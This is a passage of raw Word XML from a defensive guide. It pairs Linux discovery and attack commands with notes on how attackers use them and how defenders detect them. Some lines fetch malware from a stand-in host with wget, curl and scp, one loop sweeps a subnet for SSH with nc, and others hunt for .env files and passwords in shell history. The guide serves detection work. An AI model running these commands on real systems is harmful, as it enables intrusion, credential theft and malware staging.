        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Real-time process monitor showing CPU/Memory usage.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Useful for performance tuning. Maliciously, attackers may use it to identify high-memory processes (to detect mining software or avoid killing them). Continuous or automated use of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">top</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by unknown scripts could warrant attention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">htop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Interactive process monitor (colorful version of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">top</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Similar to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">top</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Rare in scripts because it’s interactive. Its presence in a non-interactive context suggests unauthorized users or automated tasks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Shows IP addresses of all network interfaces.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Network admins use it for configuration. Attackers use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to learn their IP configuration, especially if pivoting or tunneling. Unusual frequent use by processes can be logged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Shows the routing table.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Admins check network routes. Attackers may use it to map internal networks. Uncommon for normal users, so triggers a review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">arp -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Displays the ARP table (IP-to-MAC mappings).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers scan the network to find other hosts. If</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">arp -a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">appears in logs, especially from an unexpected source, it may indicate reconnaissance. Monitoring for ARP queries can detect network scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tnlp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Lists listening TCP ports and their processes (similar to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tnlp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Admin uses: verify open services. Attacker use: identify open ports/services to exploit or use. For example, scanning port 22 on internal hosts (e.g. via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">netcat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">loop) indicates lateral movement attempts. Detection: alert on mass port scans or internal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">queries by scripts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tnlp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Modern alternative to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tnlp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Same use-case as above. Monitoring for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ss</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">usage, especially paired with unusual users, can reveal scanners.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Test connectivity to another host.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Normally used by network admins or scripts. Attackers ping-sweep a subnet to find live hosts. Unusual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">patterns (e.g. many pings to sequential IPs) can indicate scanning. In the article, simple ping commands were part of internal network scanning</w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[9]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">for ip in 192.168.1.{1..254}; do nc -w 1 $ip 22; done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Example of a scripted scan for SSH on all subnet IPs (using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Malicious: discover SSH-accessible hosts. This loop is a tell-tale sign of lateral reconnaissance. Network monitoring would catch multiple failed connection attempts. Defensively, limit and alert on unusual outbound TCP connection attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pgrep "&lt;edr-or-sandbox&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Search running processes for known EDR/antivirus names (e.g. “crowdstrike”, “sentinel”).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pgrep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">egrep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to detect security software before launching malware. For example, the Dota3 miner did</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">egrep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for “ds_agent, falcon, sentinel”</w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[3]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Monitoring logs for these keywords or use of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pgrep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by non-root users can indicate EDR discovery attempts. Defenders can whitelist critical processes and alert on attempts to search for them.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="43" w:name="attack-objective-commands-examples"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack-Objective Commands (Examples)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Beyond generic discovery, attackers run commands tailored to objectives like credential theft, crypto-mining, or propagation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name .env</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Search entire filesystem for files named</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Malicious: Hunt for environment files containing API keys or DB credentials. If</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name .env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">runs (especially as root or quickly across</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), it should raise an alert. Use file integrity monitoring to catch these scans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /proc/cpuinfo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Display detailed CPU information.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers check CPU model/count to determine mining potential. Defenders may note this as benign if by an admin; suspicious if automated or by web process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lscpu | grep Model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Show CPU model name.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Similar to above. Attackers use it to gauge system capability. Frequent or scripted use may be monitored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">free -m</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Show memory usage.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers need memory info for mining. Defenders could log frequent memory checks by unusual users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">history | grep password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Search shell history for “password”.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Steal credentials from user history. Such commands indicate active credential searching. Detection: log history accesses or grep commands in user shells.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">scp attacker@evil.com:/path/malware .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Secure copy file from remote host.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ingress: attacker copying tools onto the victim. Monitoring for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">scp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">commands (especially outgoing or unrecognized source IPs) can catch incoming malware. Check SSHD logs for new logins corresponding to transfers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wget http://evil.com/malware.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Download a file from a URL.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Common tool for bringing in attacker scripts. Auditd can record command-line, enabling detection. In the article,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ausearch -x wget</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">revealed a download from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">artifacts.elastic.co</w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[10]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(legit tool) and from a malicious URL. Analysts should investigate all external downloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -O http://evil.com/malware.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Fetch a file (often used for stealth or piping into a shell).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers favor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for custom downloads. The article suggests the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
